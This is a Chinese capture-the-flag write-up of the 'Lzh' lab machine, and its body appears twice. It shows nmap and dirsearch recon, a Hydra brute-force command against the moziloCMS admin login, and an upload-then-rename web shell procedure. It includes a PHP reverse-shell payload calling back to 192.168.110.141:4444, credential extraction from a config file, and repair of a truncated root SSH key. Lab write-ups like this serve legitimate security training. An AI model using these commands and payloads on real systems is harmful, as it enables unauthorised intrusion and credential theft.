本文记录了 Lzh 靶机的渗透实战过程。首先通过目录扫描获取了网站的 backup.zip 源码备份,确认目标运行 moziloCMS。针对后台由于错误尝试过多导致的前端表单禁用,直接使用 Hydra 绕过前端限制成功爆破出密码 Admin123。登录后利用该 CMS 的后台上传漏洞(上传 .jpg 格式后重命名为 .php) 获取初始 Shell。随后在配置文件中提取出 welcome 用户凭据,并在其目录下找到一把损坏的 root SSH 私钥。通过手动补齐缺失的 openssh-key-v1 标准文件头 Base64 编码 ,成功修复私钥并提权至 root。 本文记录了 Lzh 靶机的渗透实战过程。首先通过目录扫描获取了网站的 backup.zip 源码备份,确认目标运行 moziloCMS。针对后台由于错误尝试过多导致的前端表单禁用,直接使用 Hydra 绕过前端限制成功爆破出密码 Admin123。登录后利用该 CMS 的后台上传漏洞(上传 .jpg 格式后重命名为 .php) 获取初始 Shell。随后在配置文件中提取出 welcome 用户凭据,并在其目录下找到一把损坏的 root SSH 私钥。通过手动补齐缺失的 openssh-key-v1 标准文件头 Base64 编码 ,成功修复私钥并提权至 root。
信息收集
# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/
403 280B http://192.168.110.133/.ht_wsr.txt
403 280B http://192.168.110.133/.htaccess_extra
403 280B http://192.168.110.133/.htaccess.orig
403 280B http://192.168.110.133/.htaccess_sc
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccessBAK
403 280B http://192.168.110.133/.htaccess.sample
403 280B http://192.168.110.133/.htaccess.bak1
403 280B http://192.168.110.133/.htaccessOLD2
403 280B http://192.168.110.133/.htaccessOLD
403 280B http://192.168.110.133/.htaccess.save
403 280B http://192.168.110.133/.htm
403 280B http://192.168.110.133/.htpasswd_test
403 280B http://192.168.110.133/.html
403 280B http://192.168.110.133/.httr-oauth
403 280B http://192.168.110.133/.htpasswds
403 280B http://192.168.110.133/.php
200 3MB http://192.168.110.133/backup.zip
403 280B http://192.168.110.133/server-status/
403 280B http://192.168.110.133/server-status漏洞分析
发现backup.zip,是一个备份网站。其中显露出moziloCMS3.0-3.0.1,其漏洞在此
1. 以管理员身份登录
2. 通过左侧菜单进入“文件”会话
3. 创建一个包含 PHP Web Shell 内容的 .jpg 文件
4. 通过上传图标将文件上传到服务器并保存
5. 在 Web 服务器上将文件重命名为 .php 并保存
6. 通过以下端点访问 Web Shell:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php先转到mozilocms目录
http://192.168.110.133/mozilo/ # 主目录
http://192.168.110.133/mozilo/admin/ # admin登陆页面
# 输入次数多了会出现
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # 输入太多错误访问数据,此时不能输入// Logindaten überprüfen
// 初始化hash
function checkLoginData($user, $pass) {
global $loginpassword;
require_once(BASE_DIR_CMS.'PasswordHash.php');
$t_hasher = new PasswordHash(8, FALSE);
//检查管理员账号
if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
return true;
} elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
return true; //检查备用账号
} else {
return false; //登陆失败返回false
}
}前端限制不能输入
<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">所以可以暴力破解
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I得到admin:Admin123进入后台
利用
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>准备payload
根据描述即可获取shell,枚举用户—>welcome
www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php: // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt: This is free software, and you are welcome to redistribute it权限提升
在welcome主目录中发现一个id_rsa是属于root的。
但是缺少前三位,这是一个openssh格式的私钥,开头是固定:openssh-key-v1\0
welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=可以进入root了
经验教训
没有仔细阅读注册的源代码,不知道密码政策
This post has not been translated to English yet.
信息收集
# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/
403 280B http://192.168.110.133/.ht_wsr.txt
403 280B http://192.168.110.133/.htaccess_extra
403 280B http://192.168.110.133/.htaccess.orig
403 280B http://192.168.110.133/.htaccess_sc
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccessBAK
403 280B http://192.168.110.133/.htaccess.sample
403 280B http://192.168.110.133/.htaccess.bak1
403 280B http://192.168.110.133/.htaccessOLD2
403 280B http://192.168.110.133/.htaccessOLD
403 280B http://192.168.110.133/.htaccess.save
403 280B http://192.168.110.133/.htm
403 280B http://192.168.110.133/.htpasswd_test
403 280B http://192.168.110.133/.html
403 280B http://192.168.110.133/.httr-oauth
403 280B http://192.168.110.133/.htpasswds
403 280B http://192.168.110.133/.php
200 3MB http://192.168.110.133/backup.zip
403 280B http://192.168.110.133/server-status/
403 280B http://192.168.110.133/server-status漏洞分析
发现backup.zip,是一个备份网站。其中显露出moziloCMS3.0-3.0.1,其漏洞在此
1. 以管理员身份登录
2. 通过左侧菜单进入“文件”会话
3. 创建一个包含 PHP Web Shell 内容的 .jpg 文件
4. 通过上传图标将文件上传到服务器并保存
5. 在 Web 服务器上将文件重命名为 .php 并保存
6. 通过以下端点访问 Web Shell:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php先转到mozilocms目录
http://192.168.110.133/mozilo/ # 主目录
http://192.168.110.133/mozilo/admin/ # admin登陆页面
# 输入次数多了会出现
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # 输入太多错误访问数据,此时不能输入// Logindaten überprüfen
// 初始化hash
function checkLoginData($user, $pass) {
global $loginpassword;
require_once(BASE_DIR_CMS.'PasswordHash.php');
$t_hasher = new PasswordHash(8, FALSE);
//检查管理员账号
if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
return true;
} elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
return true; //检查备用账号
} else {
return false; //登陆失败返回false
}
}前端限制不能输入
<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">所以可以暴力破解
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I得到admin:Admin123进入后台
利用
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>准备payload
根据描述即可获取shell,枚举用户—>welcome
www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php: // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt: This is free software, and you are welcome to redistribute it权限提升
在welcome主目录中发现一个id_rsa是属于root的。
但是缺少前三位,这是一个openssh格式的私钥,开头是固定:openssh-key-v1\0
welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=可以进入root了
经验教训
没有仔细阅读注册的源代码,不知道密码政策